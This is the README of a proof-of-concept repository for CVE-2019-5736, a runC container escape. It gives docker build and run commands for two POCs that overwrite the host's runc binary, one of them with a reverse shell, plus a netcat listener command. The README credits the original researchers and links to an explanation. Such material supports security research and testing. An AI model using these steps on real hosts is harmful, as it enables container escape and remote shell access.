RunC-CVE-2019-5736

---

Video: https://bit.ly/2WqvILb

Blog Post: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs.

Running the POCs

Note that running the POCs will overwrite the runC binary on the host.

It is highly recommened that you create a copy of your runC binary (normally at /usr/sbin/runc) before running one of the POCs.

Clone the repository:

$ git clone git@github.com:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

Overwrites runc with a simple program that prints a string.

Running the exec POC:

$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image POC

Overwrites runc with a simple reverse shell bash script that connects to localhost:2345.

Listen for the reverse shell:

$ nc -nvlp 2345

From a different shell, run the malicious image POC:

$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

Reference

See [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explaining CVE-2019-5763") for an explanation of CVE-2019-5736 and the POCs.

The malicious image POC is heavily based on [q3k’s POC](https://github.com/q3k/cve-2019-5736-poc), so all credit goes to him.